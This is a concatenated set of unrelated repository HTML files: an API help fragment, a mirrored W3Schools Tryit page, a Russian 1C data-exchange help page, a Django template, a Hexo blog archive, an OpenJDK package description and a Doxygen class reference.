<i>node</i> </dt> <dd>The actual node which needs to be generated</dd> <dt> <i>parent</i> </dt> <dd>The parent object of the node</dd> </dl> <h4 class="dtH4">See Also</h4> <p> <a href="OwlDotNetApi.IOwlVisitor.html">IOwlVisitor Interface</a> | <a href="OwlDotNetApi.html">OwlDotNetApi Namespace</a> | <a href="OwlDotNetApi.IOwlVisitor.Visit_overloads.html">IOwlVisitor.Visit Overload List</a></p> <object type="application/x-oleobject" classid="clsid:1e2a7bd0-dab9-11d0-b93a-00c04fc99f9e" viewastext="true" style="display: none;"> <param name="Keyword" value="Visit method"> </param> <param name="Keyword" value="Visit method, IOwlVisitor interface"> </param> <param name="Keyword" value="IOwlVisitor.Visit method"> </param> </object> </div> </body> </html>
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/php/showphp60b3.html
platinhom/ManualHom
<!DOCTYPE html> <html> <!-- Mirrored from www.w3schools.com/php/showphp.asp?filename=demo_func_date_time_set by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:17:22 GMT --> <head> <title>Tryit Editor v2.1 - Show PHP</title> <link rel="stylesheet" href="../trycss.css"> <!--[if lt IE 8]> <style> .textarea, .iframe {height:800px;} #iframeSource, #iframeResult {height:700px;} </style> <![endif]--> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','../../www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-3855518-1', 'auto'); ga('require', 'displayfeatures'); ga('send', 'pageview'); </script> <script type='text/javascript'> var googletag = googletag || {}; googletag.cmd = googletag.cmd || []; (function() { var gads = document.createElement('script'); gads.async = true; gads.type = 'text/javascript'; var useSSL = 'https:' == document.location.protocol; gads.src = (useSSL ? 'https:' : 'http:') + '//www.googletagservices.com/tag/js/gpt.js'; var node = document.getElementsByTagName('script')[0]; node.parentNode.insertBefore(gads, node); })(); </script> <script type='text/javascript'> googletag.cmd.push(function() { googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads()); googletag.pubads().setTargeting("content","tryphp"); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); </script> </head> <body> <div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;"> <div style="width:974px;height:94px;position:relative;margin:0px;margin-left:auto;margin-right:auto;margin-top:5px;margin-bottom:5px;padding:0px;overflow:hidden;"> <!-- TryitLeaderboard --> <div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'> <script type='text/javascript'> googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); }); </script> </div> <div style="clear:both"></div> </div> </div> <div class="container"> <div class="textareacontainer"> <div class="textarea"> <div class="headerText">PHP Source:</div> <div class="iframewrapper"> <iframe id="iframeSource" frameborder="0" src="showphpcode23a8.html?source=demo_func_date_time_set"></iframe> </div> </div> </div> <div class="iframecontainer"> <div class="iframe"> <div class="headerText">Result:</div> <div class="iframewrapper"> <iframe id="iframeResult" frameborder="0" src="demo_func_date_time_set.html"></iframe> </div> <div class="footerText">Show PHP - &copy; <a href="../index.html">w3schools.com</a></div> </div> </div> </div> </body> <!-- Mirrored from www.w3schools.com/php/showphp.asp?filename=demo_func_date_time_set by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:17:22 GMT --> </html>
Catalog/СценарииОбменовДанными/Form/ФормаЭлемента/Help/ru.html
GaLich83/NSI
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta content="text/html; charset=utf-8" http-equiv="Content-Type"></meta><link rel="stylesheet" type="text/css" href="v8help://service_book/service_style"></link><meta name="GENERATOR" content="MSHTML 10.00.9200.17229"></meta></head><body> <p>Основное назначение сценария - это выполнение <a href="CommonForm.ОбменыДанными/Help">синхронизации данных</a> автоматически по заданному расписанию. Сценарий необходим для задания расписания и порядка отправки и получения данных. </p> <p>Не рекомендуется выполнять только отправку данных или только получение данных, хотя сценарий позволяет это сделать. Рекомендуется выполнять полноценную синхронизацию данных в одном сценарии.</p> <h3>Настройка сценария синхронизации</h3> <ul><li>Введите <strong>Наименование</strong> сценария. Необходимо указать наименования баз данных, участвующих в синхронизации, редакцию программы, для того чтобы все пользователи могли понять назначение данного сценария. </li><li>Настройте расписание выполнения сценария синхронизации данных. <ul><li>Включите флажок <strong>Автоматически по расписанию</strong>. После этого становится доступной для выбора ссылка (По умолчанию равна <strong>Расписание не задано</strong>). Нажмите ссылку для того чтобы задать <a href="v8help://mngbase/jobschedule.lf">расписание</a>. После подтверждения расписания ссылка показывает составленное расписание.</li></ul></li><li>Выберите информационные базы, для которых будет выполняться сценарий синхронизации данных (как правило, сценарий настраивается для обмена с одной информационной базой и включает отправку и получение данных). Для каждой информационной базы выберите способ подключения и выполняемое действие (отправка или получение). Нажмите <strong>Добавить</strong>, заполните соответствующие колонки: <ul><li><strong>Информационная база</strong> - <img src="StdPicture.Select" width="12" height="12"></img> <strong>Выберите</strong> тип данных. Затем из предложенного списка нужного типа выберите информационную базу; </li><li><strong>Подключение</strong> - выберите способ подключения из списка (зависит от свойств выбранной информационной базы); </li><li><strong>Выполняемое действие</strong> - с помощью кнопки <img src="StdPicture.Select"></img><strong>Выберите</strong> <strong>Получение</strong> или <strong>Отправка данных</strong>; </li></ul></li><li>Напишите <strong>Комментарий</strong> - краткое описание сценария.</li></ul><h3>Выполнение сценария</h3> <ul><li>Нажмите <img src="CommonPicture.СинхронизацияДанныхВыполнение"></img> <strong>Выполнить сценарий</strong>. Будет предпринята попытка синхронизации данных. Перечисленные в сценарии действия будут выполняться последовательно. После того как синхронизация данных проведена, неудачные получения или отправки данных отмечаются значком <img src="CommonPicture.СостояниеОбменаДаннымиОшибка"></img> в колонке <strong>Информационная база</strong>.</li></ul><h3>См. также:</h3> <ul><li><a href="Catalog.СценарииОбменовДанными/Help">Сценарии синхронизации данных</a>; </li><li><a href="v8help://frame/form_common">Работа с формами</a>.</li></ul></body></html>
libdecoder/html/testsuite/case/tag-detail.html
eyoung-father/eyoung
<html> <body> <details open="open"> <summary>Copyright 2011.</summary> <p>All pages and graphics on this web site are the property of W3School.</p> </details> </body> </html>
templates/lite_note/main.html
Shiwin/LiteNote
{% extends 'base.html' %} {% block login-and-list %} <div class="login"> <section class="login-section"> <ul class="right"> {% if user.is_authenticated %} <li><a href="/logout/">Выйти ({{ user.username }})</a></li> <li><a href="/create/">Добавить заметку</a> </li> {% else %} <li><a href="/login/">Войти</a></li> <li><a href="/register/">Регистрация</a></li> {% endif %} </ul> </section> </div> {% block list %}{% endblock %} {% endblock %}
archives/2017/03/index.html
maydaychen/maydaychen.github.io
<!DOCTYPE html> <html class="theme-next pisces use-motion" lang="zh-CN"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"> <meta name="theme-color" content="#222"> <meta http-equiv="Cache-Control" content="no-transform"> <meta http-equiv="Cache-Control" content="no-siteapp"> <link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css"> <link href="/css/main.css?v=6.4.2" rel="stylesheet" type="text/css"> <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.4.2"> <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.4.2"> <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.4.2"> <link rel="mask-icon" href="/images/logo.svg?v=6.4.2" color="#222"> <script type="text/javascript" id="hexo.configurations"> var NexT = window.NexT || {}; var CONFIG = { root: '/', scheme: 'Pisces', version: '6.4.2', sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false}, fancybox: false, fastclick: false, lazyload: false, tabs: true, motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}, algolia: { applicationID: '', apiKey: '', indexName: '', hits: {"per_page":10}, labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"} } }; </script> <meta name="description" content="记录自己成长过程中遇到的困难们,共勉!"> <meta property="og:type" content="website"> <meta property="og:title" content="陈译的博客"> <meta property="og:url" content="maydaychen.github.io/archives/2017/03/index.html"> <meta property="og:site_name" content="陈译的博客"> <meta property="og:description" content="记录自己成长过程中遇到的困难们,共勉!"> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="陈译的博客"> <meta name="twitter:description" content="记录自己成长过程中遇到的困难们,共勉!"> <link rel="alternate" href="/atom.xml" title="陈译的博客" type="application/atom+xml"> <link rel="canonical" href="maydaychen.github.io/archives/2017/03/"> <script type="text/javascript" id="page.configurations"> CONFIG.page = { sidebar: "", }; </script> <title>归档 | 陈译的博客</title> <script type="text/javascript"> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?cf2b8d8aacc71e58ddb8f2d904f3e6db"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <noscript> <style type="text/css"> .use-motion .motion-element, .use-motion .brand, .use-motion .menu-item, .sidebar-inner, .use-motion .post-block, .use-motion .pagination, .use-motion .comments, .use-motion .post-header, .use-motion .post-body, .use-motion .collection-title { opacity: initial; } .use-motion .logo, .use-motion .site-title, .use-motion .site-subtitle { opacity: initial; top: initial; } .use-motion { .logo-line-before i { left: initial; } .logo-line-after i { right: initial; } } </style> </noscript> </head> <body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN"> <div class="container sidebar-position-left page-archive"> <div class="headband"></div> <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader"> <div class="header-inner"><div class="site-brand-wrapper"> <div class="site-meta"> <div class="custom-logo-site-title"> <a href="/" class="brand" rel="start"> <span class="logo-line-before"><i></i></span> <span class="site-title">陈译的博客</span> <span class="logo-line-after"><i></i></span> </a> </div> <p class="site-subtitle">Android,Web</p> </div> <div class="site-nav-toggle"> <button aria-label="切换导航栏"> <span class="btn-bar"></span> <span class="btn-bar"></span> <span class="btn-bar"></span> </button> </div> </div> <nav class="site-nav"> <ul id="menu" class="menu"> <li class="menu-item menu-item-home"> <a href="/" rel="section"> <i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a> </li> <li class="menu-item menu-item-tags"> <a href="/tags/" rel="section"> <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a> </li> <li class="menu-item menu-item-categories"> <a href="/categories/" rel="section"> <i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a> </li> <li class="menu-item menu-item-archives menu-item-active"> <a href="/archives/" rel="section"> <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a> </li> </ul> </nav> </div> </header> <main id="main" class="main"> <div class="main-inner"> <div class="content-wrap"> <div id="content" class="content"> <div class="post-block archive"> <div id="posts" class="posts-collapse"> <span class="archive-move-on"></span> <span class="archive-page-counter"> 嗯..! 目前共计 14 篇日志。 继续努力。 </span> <div class="collection-title"> <h1 class="archive-year" id="archive-year-2017">2017</h1> </div> <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article"> <header class="post-header"> <h2 class="post-title"> <a class="post-title-link" href="/2017/03/23/迟来的年度总结/" itemprop="url"> <span itemprop="name">迟来的年度总结</span> </a> </h2> <div class="post-meta"> <time class="post-time" itemprop="dateCreated" datetime="2017-03-23T21:00:14+08:00" content="2017-03-23"> 03-23 </time> </div> </header> </article> <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article"> <header class="post-header"> <h2 class="post-title"> <a class="post-title-link" href="/2017/03/22/Tablayout之Tab宽度左右无法填充/" itemprop="url"> <span itemprop="name">Tablayout之Tab宽度左右无法填充</span> </a> </h2> <div class="post-meta"> <time class="post-time" itemprop="dateCreated" datetime="2017-03-22T21:48:05+08:00" content="2017-03-22"> 03-22 </time> </div> </header> </article> <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article"> <header class="post-header"> <h2 class="post-title"> <a class="post-title-link" href="/2017/03/22/linux相关简易操作汇总(实时更新)/" itemprop="url"> <span itemprop="name">linux相关简易操作汇总(实时更新)</span> </a> </h2> <div class="post-meta"> <time class="post-time" itemprop="dateCreated" datetime="2017-03-22T21:30:32+08:00" content="2017-03-22"> 03-22 </time> </div> </header> </article> <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article"> <header class="post-header"> <h2 class="post-title"> <a class="post-title-link" href="/2017/03/21/Android5.0以下报NoClassDefFoundError/" itemprop="url"> <span itemprop="name">Android5.0以下报NoClassDefFoundError</span> </a> </h2> <div class="post-meta"> <time class="post-time" itemprop="dateCreated" datetime="2017-03-21T21:11:01+08:00" content="2017-03-21"> 03-21 </time> </div> </header> </article> <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article"> <header class="post-header"> <h2 class="post-title"> <a class="post-title-link" href="/2017/03/21/hello-world/" itemprop="url"> <span itemprop="name">Hello World</span> </a> </h2> <div class="post-meta"> <time class="post-time" itemprop="dateCreated" datetime="2017-03-21T20:22:37+08:00" content="2017-03-21"> 03-21 </time> </div> </header> </article> </div> </div> </div> </div> <div class="sidebar-toggle"> <div class="sidebar-toggle-line-wrap"> <span class="sidebar-toggle-line sidebar-toggle-line-first"></span> <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span> <span class="sidebar-toggle-line sidebar-toggle-line-last"></span> </div> </div> <aside id="sidebar" class="sidebar"> <div class="sidebar-inner"> <section class="site-overview-wrap sidebar-panel sidebar-panel-active"> <div class="site-overview"> <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person"> <p class="site-author-name" itemprop="name">maydaychen</p> <p class="site-description motion-element" itemprop="description">记录自己成长过程中遇到的困难们,共勉!</p> </div> <nav class="site-state motion-element"> <div class="site-state-item site-state-posts"> <a href="/archives/"> <span class="site-state-item-count">14</span> <span class="site-state-item-name">日志</span> </a> </div> <div class="site-state-item site-state-categories"> <a href="/categories/index.html"> <span class="site-state-item-count">4</span> <span class="site-state-item-name">分类</span> </a> </div> <div class="site-state-item site-state-tags"> <a href="/tags/index.html"> <span class="site-state-item-count">14</span> <span class="site-state-item-name">标签</span> </a> </div> </nav> <div class="feed-link motion-element"> <a href="/atom.xml" rel="alternate"> <i class="fa fa-rss"></i> RSS </a> </div> <div class="links-of-author motion-element"> <span class="links-of-author-item"> <a href="https://github.com/maydaychen" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a> </span> <span class="links-of-author-item"> <a href="https://www.zhihu.com/people/chen-yi-1-97-70/activities" target="_blank" title="知乎"><i class="fa fa-fw fa-book"></i>知乎</a> </span> <span class="links-of-author-item"> <a href="https://www.weibo.com/2033967624/profile?rightmod=1&wvr=6&mod=personinfo&is_all=1" target="_blank" title="微博"><i class="fa fa-fw fa-weibo"></i>微博</a> </span> <span class="links-of-author-item"> <a href="https://www.jianshu.com/u/09f8df92e54a" target="_blank" title="简书"><i class="fa fa-fw fa-stack-overflow"></i>简书</a> </span> </div> </div> </section> </div> </aside> </div> </main> <footer id="footer" class="footer"> <div class="footer-inner"> <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span> <span class="with-love" id="animate"> <i class="fa fa-user"></i> </span> <span class="author" itemprop="copyrightHolder">maydaychen</span> </div> <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v3.2.2</div> <span class="post-meta-divider">|</span> <div class="theme-info">主题 – <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Pisces</a> v6.4.2</div> </div> </footer> <div class="back-to-top"> <i class="fa fa-arrow-up"></i> </div> </div> <script type="text/javascript"> if (Object.prototype.toString.call(window.Promise) !== '[object Function]') { window.Promise = null; } </script> <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script> <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script> <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script> <script type="text/javascript" src="/js/src/utils.js?v=6.4.2"></script> <script type="text/javascript" src="/js/src/motion.js?v=6.4.2"></script> <script type="text/javascript" src="/js/src/affix.js?v=6.4.2"></script> <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.4.2"></script> <script type="text/javascript" src="/js/src/bootstrap.js?v=6.4.2"></script> </body> </html>
openjdk/jdk/src/share/classes/java/nio/channels/spi/package.html
TheTypoMaster/Scaper
<!-- Copyright 2000-2009 Sun Microsystems, Inc. All Rights Reserved. DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. This code is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 only, as published by the Free Software Foundation. Sun designates this particular file as subject to the "Classpath" exception as provided by Sun in the LICENSE file that accompanied this code. This code is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License version 2 for more details (a copy is included in the LICENSE file that accompanied this code). You should have received a copy of the GNU General Public License version 2 along with this work; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. Please contact Sun Microsystems, Inc., 4150 Network Circle, Santa Clara, CA 95054 USA or visit www.sun.com if you need additional information or have any questions. --> <!doctype html public "-//IETF//DTD HTML//EN"> <html> <body bgcolor="white"> Service-provider classes for the <tt>{@link java.nio.channels}</tt> package. <p> Only developers who are defining new selector providers or asynchronous channel providers should need to make direct use of this package. </p> <p> Unless otherwise noted, passing a <tt>null</tt> argument to a constructor or method in any class or interface in this package will cause a {@link java.lang.NullPointerException NullPointerException} to be thrown. @since 1.4 @author Mark Reinhold @author JSR-51 Expert Group </body> </html>
usr/share/doc/libwibble-dev/html/structwibble_1_1log_1_1LevelFilter.html
2ndy/RaspIM
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <title>wibble: wibble::log::LevelFilter Struct Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">wibble &#160;<span id="projectnumber">0.1.28</span> </div> </td> </tr> </tbody> </table> </div> <!-- Generated by Doxygen 1.7.6.1 --> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li class="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="annotated.html"><span>Class&#160;List</span></a></li> <li><a href="inherits.html"><span>Class&#160;Hierarchy</span></a></li> <li><a href="functions.html"><span>Class&#160;Members</span></a></li> </ul> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="namespacewibble.html">wibble</a> </li> <li class="navelem"><a class="el" href="namespacewibble_1_1log.html">log</a> </li> <li class="navelem"><a class="el" href="structwibble_1_1log_1_1LevelFilter.html">LevelFilter</a> </li> </ul> </div> </div> <div class="header"> <div class="summary"> <a href="#pub-methods">Public Member Functions</a> &#124; <a href="#pub-attribs">Public Attributes</a> </div> <div class="headertitle"> <div class="title">wibble::log::LevelFilter Struct Reference</div> </div> </div><!--header--> <div class="contents"> <!-- doxytag: class="wibble::log::LevelFilter" --><!-- doxytag: inherits="wibble::log::Sender" --> <p>Log only messages whose level is &gt;= minLevel. <a href="structwibble_1_1log_1_1LevelFilter.html#details">More...</a></p> <p><code>#include &lt;<a class="el" href="filters_8h_source.html">filters.h</a>&gt;</code></p> <div class="dynheader"> Inheritance diagram for wibble::log::LevelFilter:</div> <div class="dyncontent"> <div class="center"><img src="structwibble_1_1log_1_1LevelFilter__inherit__graph.png" border="0" usemap="#wibble_1_1log_1_1LevelFilter_inherit__map" alt="Inheritance graph"/></div> <map name="wibble_1_1log_1_1LevelFilter_inherit__map" id="wibble_1_1log_1_1LevelFilter_inherit__map"> </map> <center><span class="legend">[<a href="graph_legend.html">legend</a>]</span></center></div> <div class="dynheader"> Collaboration diagram for wibble::log::LevelFilter:</div> <div class="dyncontent"> <div class="center"><img src="structwibble_1_1log_1_1LevelFilter__coll__graph.png" border="0" usemap="#wibble_1_1log_1_1LevelFilter_coll__map" alt="Collaboration graph"/></div> <map name="wibble_1_1log_1_1LevelFilter_coll__map" id="wibble_1_1log_1_1LevelFilter_coll__map"> </map> <center><span class="legend">[<a href="graph_legend.html">legend</a>]</span></center></div> <p><a href="structwibble_1_1log_1_1LevelFilter-members.html">List of all members.</a></p> <table class="memberdecls"> <tr><td colspan="2"><h2><a name="pub-methods"></a> Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top">&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="structwibble_1_1log_1_1LevelFilter.html#a0369259eea8f8a8cebdd80817435fa8e">LevelFilter</a> (<a class="el" href="structwibble_1_1log_1_1Sender.html">Sender</a> *<a class="el" href="structwibble_1_1log_1_1LevelFilter.html#ae4df7d3a7308c58f167e524d9c5a3450">next</a>=0, <a class="el" href="namespacewibble_1_1log.html#ac0bfc8ba09ff831d64940f08a5e4c4f0">log::Level</a> <a class="el" href="structwibble_1_1log_1_1LevelFilter.html#a9918013bf14a0ab39d08a431b8423d1d">minLevel</a>=<a class="el" href="namespacewibble_1_1log.html#ac0bfc8ba09ff831d64940f08a5e4c4f0a7d20b9f6ab7ec0b4dd6ad3cbd40317bd">log::INFO</a>)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">virtual&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="structwibble_1_1log_1_1LevelFilter.html#a92bcf7a0a476caad4e01a4cc457a2573">~LevelFilter</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">virtual void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="structwibble_1_1log_1_1LevelFilter.html#aa3fd499729efb2ec951f1e7b95f92c3a">send</a> (<a class="el" href="namespacewibble_1_1log.html#ac0bfc8ba09ff831d64940f08a5e4c4f0">log::Level</a> level, const std::string &amp;msg)</td></tr> <tr><td class="mdescLeft">&#160;</td><td class="mdescRight">Log one line of text with the given level. <a href="#aa3fd499729efb2ec951f1e7b95f92c3a"></a><br/></td></tr> <tr><td colspan="2"><h2><a name="pub-attribs"></a> Public Attributes</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="el" href="structwibble_1_1log_1_1Sender.html">Sender</a> *&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="structwibble_1_1log_1_1LevelFilter.html#ae4df7d3a7308c58f167e524d9c5a3450">next</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="el" href="namespacewibble_1_1log.html#ac0bfc8ba09ff831d64940f08a5e4c4f0">log::Level</a>&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="structwibble_1_1log_1_1LevelFilter.html#a9918013bf14a0ab39d08a431b8423d1d">minLevel</a></td></tr> </table> <hr/><a name="details" id="details"></a><h2>Detailed Description</h2> <div class="textblock"><p>Log only messages whose level is &gt;= minLevel. </p> </div><hr/><h2>Constructor &amp; Destructor Documentation</h2> <a class="anchor" id="a0369259eea8f8a8cebdd80817435fa8e"></a><!-- doxytag: member="wibble::log::LevelFilter::LevelFilter" ref="a0369259eea8f8a8cebdd80817435fa8e" args="(Sender *next=0, log::Level minLevel=log::INFO)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="structwibble_1_1log_1_1LevelFilter.html#a0369259eea8f8a8cebdd80817435fa8e">wibble::log::LevelFilter::LevelFilter</a> </td> <td>(</td> <td class="paramtype"><a class="el" href="structwibble_1_1log_1_1Sender.html">Sender</a> *&#160;</td> <td class="paramname"><em>next</em> = <code>0</code>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype"><a class="el" href="namespacewibble_1_1log.html#ac0bfc8ba09ff831d64940f08a5e4c4f0">log::Level</a>&#160;</td> <td class="paramname"><em>minLevel</em> = <code><a class="el" href="namespacewibble_1_1log.html#ac0bfc8ba09ff831d64940f08a5e4c4f0a7d20b9f6ab7ec0b4dd6ad3cbd40317bd">log::INFO</a></code>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div> <div class="memdoc"> </div> </div> <a class="anchor" id="a92bcf7a0a476caad4e01a4cc457a2573"></a><!-- doxytag: member="wibble::log::LevelFilter::~LevelFilter" ref="a92bcf7a0a476caad4e01a4cc457a2573" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="structwibble_1_1log_1_1LevelFilter.html#a92bcf7a0a476caad4e01a4cc457a2573">wibble::log::LevelFilter::~LevelFilter</a> </td> <td>(</td> <td class="paramname"></td><td>)</td> <td><code> [virtual]</code></td> </tr> </table> </div> <div class="memdoc"> </div> </div> <hr/><h2>Member Function Documentation</h2> <a class="anchor" id="aa3fd499729efb2ec951f1e7b95f92c3a"></a><!-- doxytag: member="wibble::log::LevelFilter::send" ref="aa3fd499729efb2ec951f1e7b95f92c3a" args="(log::Level level, const std::string &amp;msg)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void <a class="el" href="structwibble_1_1log_1_1LevelFilter.html#aa3fd499729efb2ec951f1e7b95f92c3a">wibble::log::LevelFilter::send</a> </td> <td>(</td> <td class="paramtype"><a class="el" href="namespacewibble_1_1log.html#ac0bfc8ba09ff831d64940f08a5e4c4f0">log::Level</a>&#160;</td> <td class="paramname"><em>level</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">const std::string &amp;&#160;</td> <td class="paramname"><em>msg</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td><code> [virtual]</code></td> </tr> </table> </div> <div class="memdoc"> <p>Log one line of text with the given level. </p> <p>Do not add a trailing newline </p> <p>Implements <a class="el" href="structwibble_1_1log_1_1Sender.html#a55559edb2ae1607b42d86e64ea92a7cb">wibble::log::Sender</a>.</p> <p>References <a class="el" href="structwibble_1_1log_1_1LevelFilter.html#a9918013bf14a0ab39d08a431b8423d1d">minLevel</a>, <a class="el" href="structwibble_1_1log_1_1LevelFilter.html#ae4df7d3a7308c58f167e524d9c5a3450">next</a>, and <a class="el" href="structwibble_1_1log_1_1Sender.html#a55559edb2ae1607b42d86e64ea92a7cb">wibble::log::Sender::send()</a>.</p> </div> </div> <hr/><h2>Member Data Documentation</h2> <a class="anchor" id="a9918013bf14a0ab39d08a431b8423d1d"></a><!-- doxytag: member="wibble::log::LevelFilter::minLevel" ref="a9918013bf14a0ab39d08a431b8423d1d" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="namespacewibble_1_1log.html#ac0bfc8ba09ff831d64940f08a5e4c4f0">log::Level</a> <a class="el" href="structwibble_1_1log_1_1LevelFilter.html#a9918013bf14a0ab39d08a431b8423d1d">wibble::log::LevelFilter::minLevel</a></td> </tr> </table> </div> <div class="memdoc"> <p>Referenced by <a class="el" href="structwibble_1_1log_1_1LevelFilter.html#aa3fd499729efb2ec951f1e7b95f92c3a">send()</a>.</p> </div> </div> <a class="anchor" id="ae4df7d3a7308c58f167e524d9c5a3450"></a><!-- doxytag: member="wibble::log::LevelFilter::next" ref="ae4df7d3a7308c58f167e524d9c5a3450" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="structwibble_1_1log_1_1Sender.html">Sender</a>* <a class="el" href="structwibble_1_1log_1_1LevelFilter.html#ae4df7d3a7308c58f167e524d9c5a3450">wibble::log::LevelFilter::next</a></td> </tr> </table> </div> <div class="memdoc"> <p>Referenced by <a class="el" href="structwibble_1_1log_1_1LevelFilter.html#aa3fd499729efb2ec951f1e7b95f92c3a">send()</a>.</p> </div> </div> <hr/>The documentation for this struct was generated from the following files:<ul> <li><a class="el" href="filters_8h_source.html">filters.h</a></li> <li><a class="el" href="filters_8cpp.html">filters.cpp</a></li> </ul> </div><!-- contents --> <hr class="footer"/><address class="footer"><small> Generated on Wed May 2 2012 23:57:35 for wibble by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.7.6.1 </small></address> </body> </html>
inc/assets/css/rtl/purple.css
nazamhamdi/souleimaconfection
